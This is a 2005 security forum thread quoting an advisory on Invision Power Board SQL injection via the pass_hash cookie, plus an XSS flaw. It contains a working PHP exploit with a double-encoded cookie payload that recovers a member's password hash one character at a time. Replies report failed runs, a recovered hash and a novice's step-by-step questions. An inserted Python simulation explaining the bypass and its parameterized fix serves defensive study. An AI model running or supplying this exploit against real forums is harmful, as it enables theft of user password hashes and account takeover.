Waraxe IT Security Portal  
Another Invision Power Board SQL Injection exploit <2.0.4
Posted: Tue May 17, 2005 12:01 am
ColdWinteR (Beginner) | Joined: May 17, 2005 | Posts: 1

Quote:
##########################################################
# GulfTech Security Research May 5th, 2005
##########################################################
# Vendor : Invision Power Services
# URL : http://www.invisionboard.com/
# Version : All Versions Prior To 2.0.4
# Risk : Multiple Vulnerabilities
##########################################################

Description:
Invision Power Board (IPB) is a professional forum system that
has been built from the ground up with speed and security in
mind. It is used by a great many people all over the world. All
versions of Invision Power Board are vulnerable to a serious
SQL Injection vulnerability if magic_quotes_gpc is set to off.
An attacker does not have to be logged in, or even have access
or permission to view the forums in order to exploit this
vulnerability. Users should upgrade immediately.



SQL Injection:
I have discovered a serious SQL Injection issue in Invision
Power Board that affects almost all versions of Invision Power
Board regardless of most server configurations. Also, because
of the fact that UNION functionality is not needed, an attacker
need not worry if the victim is running an up-to-date version
of MySQL. The vulnerability lies in the way that Invision Board
handles certain types of "login methods". Let us have a look
at the source of 'sources/login.php'.

if ( ! $ibforums->member['id'] )
{
    $mid = intval($std->my_getcookie('member_id'));
    $pid = $std->my_getcookie('pass_hash');

    if ($mid and $pid)
    {
        $DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");

        if ( $member = $DB->fetch_row() )
        {
            $ibforums->member = $member;
            $ibforums->session_id = "";
            $std->my_setcookie('session_id','0', -1 );
        }
    }
}

This particular portion of code is from the IPB 1.* series, but
the vulnerability seems to exist in all versions of IPB (both
the 1.* and 2.* series). Anyway, as we can see from the above
code the variable $mid is properly forced into an integer datatype
and as a result is safe to pass to the query, but what about
$pid? In the above code we see that the value of $pid is returned
from the my_getcookie() function within the FUNC class. Well,
let us have a look at this function to see if $pid is sanitized
within the function itself.

function my_getcookie($name)
{
    global $ibforums;

    if (isset($_COOKIE[$ibforums->vars['cookie_id'].$name]))
    {
        return urldecode($_COOKIE[$ibforums->vars['cookie_id'].$name]);
    }
    else
    {
        return FALSE;
    }
}

In the above code we can see that not only is the data
unsanitized, but the way the urldecode() function is used also
lets an attacker bypass magic_quotes_gpc. Now, back to the
auto_login() function where we want to concentrate on this bit
of code.


$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");

if ( $member = $DB->fetch_row() )
{
    $ibforums->member = $member;
    $ibforums->session_id = "";
    $std->my_setcookie('session_id','0', -1 );
}


This would be a very easy issue to exploit if visible data was
returned to the browser, but all we will be able to see is a line
in the response header that looks something like this.

Set-Cookie: session_id=0; path=/; domain=example.com

If we see this then we know the query returned true and produced
some results. This is not that easy of an issue to exploit, but
there are a number of ways to successfully take advantage of this
issue. For one an attacker can select member data into an outfile
and use their browser to retrieve that data, or use the MySQL "mid"
function to enumerate each character of the hash one by one until
the entire hash is discovered! In future versions of MySQL issues
like this will be a lot easier to exploit as we will then be able
to "SELECT * FROM `blah` INTO TABLE `foobar`" much like Oracle
database for example. With functionality like that an attacker can
then do things like dump user data into a message to himself. There
is working exploit code for this issue available, but we will not
be releasing it publicly. Users should upgrade as soon as possible,
as this is a fairly dangerous vulnerability.



Cross Site Scripting:
It is possible for an attacker to conduct Cross Site Scripting attacks
in all versions of Invision Power Board prior to the recently released
2.0.4. This vulnerability exists due to data submitted to the "highlite"
parameter not being sanitized properly when displaying search results.
The same issue also exists in "sources/topics.php". The only condition
is that the data sent to the "highlite" parameter must be double hex
encoded in order to bypass the global sanitation methods.



Solution:
Matthew Mecham addressed these issues in a VERY timely and professional
manner and fixes have been available for some time now.

http://forums.invisionpower.com/index.php?showtopic=168016

All users should upgrade their Invision Power Board installations as
soon as possible, as these vulnerabilities make it fairly easy to grab
sensitive user data including password hashes from the database.


Special Thanks:
GulfTech Security Research team would like to thank Mr. Janek Vind for
working with us in finding creative ways to exploit these issues. You
can visit his website at http://www.waraxe.us


Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00073-05052005


Credits:
James Bercegay of the GulfTech Security Research Team

The following exploit is made available (by "David Wang"):
Code:
<?php
$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
   random number. */
$id = 10;
$pass = "";

/* Recovered characters are appended here; initialised so the first .= does
   not operate on an undefined variable. */
$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes.
                   This is translated to ' by urldecode. */
                $cookie = "member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                $cookie .= "%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

                /* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR id=$target
                                       HAVING id=$target AND MID(`password`,$i,1)='$letter' */

                $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
                if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;

                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);
        $header = "";   /* response headers are accumulated here */

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "HEAD $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Cookie: $cookie\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                /* read until the blank line that terminates the header block */
                do {
                        $header .= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>

My test result was something like this:
Code:
1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000

Could somebody successfully exploit this?
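As an added example (not from the GulfTech advisory or the posted exploit), the following Python simulation shows why a cookie quote sent as %2527 gets past magic_quotes_gpc in the login.php path quoted above, gives a detection check for such double-encoded values, and places the string-built query beside a parameterized one. The addslashes() stand-in, the function names and the ibf_members rows are constructed for the demonstration.

```python
import sqlite3
from urllib.parse import unquote

def addslashes(s):
    """Stand-in for PHP's addslashes(), which magic_quotes_gpc applied to $_COOKIE."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def ipb_pass_hash_cookie(raw_cookie_value, magic_quotes=True):
    """Order of operations behind the my_getcookie() bug described in the advisory:
    1. PHP urldecodes the Cookie header once when it builds $_COOKIE,
    2. magic_quotes_gpc (if on) backslash-escapes quotes in that decoded value,
    3. my_getcookie() runs urldecode() a second time.
    A quote sent as %2527 is still %27 at step 2, so nothing gets escaped, and
    step 3 turns it into a bare quote that is then interpolated into the SQL."""
    value = unquote(raw_cookie_value)
    if magic_quotes:
        value = addslashes(value)
    return unquote(value)

def is_double_encoded(raw_cookie_value):
    """Detection check for a request filter or log review: a value that still
    changes under a second urldecode carried a nested %XX escape."""
    once = unquote(raw_cookie_value)
    return unquote(once) != once

def demo_db():
    """Constructed ibf_members table with placeholder password hashes (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ibf_members (id INTEGER PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO ibf_members VALUES (10, 'aaaa'), (81, 'bbbb')")
    return conn

def auto_login_vulnerable(conn, mid, pid):
    """String-built query as in sources/login.php: $pid is interpolated verbatim."""
    sql = f"SELECT id FROM ibf_members WHERE id={int(mid)} AND password='{pid}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def auto_login_fixed(conn, mid, pid):
    """Hardened form: bind the decoded cookie value as a parameter, so any quote
    in it is data rather than SQL, whatever magic_quotes_gpc or the encoding did."""
    sql = "SELECT id FROM ibf_members WHERE id=? AND password=?"
    row = conn.execute(sql, (int(mid), pid)).fetchone()
    return row[0] if row else None
```

Note that is_double_encoded() also flags a legitimate value that contains a literal "%25"; for pass_hash, which should be 32 hex characters, that is not a real source of false positives.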
Posted: Wed Jun 01, 2005 10:32 pm
mister (Beginner) | Joined: Jun 02, 2005 | Posts: 4

I have the same result, nobody has information?
Posted: Wed Jul 06, 2005 1:04 pm
petitmaitreblanc (Regular user) | Joined: Jul 05, 2005 | Posts: 18

Same result here.
Posted: Wed Jul 06, 2005 2:41 pm
gulftech (Valuable expert) | Joined: Apr 20, 2005 | Posts: 9

The headers sent by this exploit script are not RFC compliant and confuse virtualhosts. That is why the LWP versions work (LWP Builds the headers for you) and this one does not.
Posted: Thu Jul 07, 2005 6:49 pm
str0ke (Beginner) | Joined: Jul 07, 2005 | Posts: 4

This exploit only works on 1.3.1 Final and below.

/str0ke
Posted: Sun Sep 18, 2005 8:32 am
nhtu (Beginner) | Joined: Jan 13, 2005 | Posts: 2

Quote:
Code:
<?php
$server = "SERVER";
$port = 80;
$file = "PATH";
?>

My test result was something like this:
Code:
1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000

Could somebody successfully exploit this?

example:
$server = "www.hack.com";
$port = 80;
$file = "/"; or $file = "/forum/";
Posted: Sun Sep 18, 2005 11:13 am
Unicorn (Regular user) | Joined: Jul 17, 2005 | Posts: 14

It works!
http://unicorn.pri.ee/kodeerija.php
1: 3 2: f 3: 1 4: c 5: d 6: 5 7: 7 8: 7 9: 0 10: c 11: c 12: d 13: 9 14: 9 15: 5 16: 7 17: 6 18: 4 19: f 20: d 21: b 22: f 23: 3 24: 5 25: 0 26: 3 27: 0 28: 9 29: 5 30: 5 31: 6 32: a Final Hash: 3f1cd5770ccd995764fdbf350309556a
Posted: Wed Sep 21, 2005 8:01 am
super (Active user) | Joined: Sep 19, 2005 | Posts: 30

How can I use this exploit? I don't know.
Should I need perl software for this? Please tell me.
Posted: Wed Sep 21, 2005 2:03 pm
Chb (Valuable expert) | Joined: Jul 23, 2005 | Posts: 206 | Location: Germany

super wrote:
Should I need perl software for this? Please tell me.


No, it's just a PHP script. So you need a webserver with PHP.
Then you have to fill in the variables in the script and run it.

_________________
www.der-chb.de
Posted: Wed Sep 21, 2005 2:30 pm
super (Active user) | Joined: Sep 19, 2005 | Posts: 30

OK, how could I fill in the PHP? Please tell me step by step if possible.
I have no idea about this exploit.
Posted: Wed Sep 21, 2005 3:24 pm
Chb (Valuable expert) | Joined: Jul 23, 2005 | Posts: 206 | Location: Germany

super wrote:
OK, how could I fill in the PHP? Please tell me step by step if possible.
I have no idea about this exploit.


Just look at the first four rows...

_________________
www.der-chb.de
Posted: Thu Sep 22, 2005 4:00 pm
super (Active user) | Joined: Sep 19, 2005 | Posts: 30

Should I need to upload this PHP file? If so, where do I upload it? Please show some link where I can upload this PHP file. How can I upload it?
Posted: Fri Sep 23, 2005 2:34 pm
Chb (Valuable expert) | Joined: Jul 23, 2005 | Posts: 206 | Location: Germany

Drop it until you know the basics I'd say...
Google ftp-client, sql-injection, php, apache...

_________________
www.der-chb.de
Posted: Mon Sep 26, 2005 8:58 pm
super (Active user) | Joined: Sep 19, 2005 | Posts: 30

OK, I uploaded this PHP to this server:
http://www.geocities.com/mahalanabis1/2.php

Now what do I need to do? Please help.
Posted: Tue Sep 27, 2005 11:26 am
Chb (Valuable expert) | Joined: Jul 23, 2005 | Posts: 206 | Location: Germany

The webserver of your webspace does not accept PHP scripts.

_________________
www.der-chb.de
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"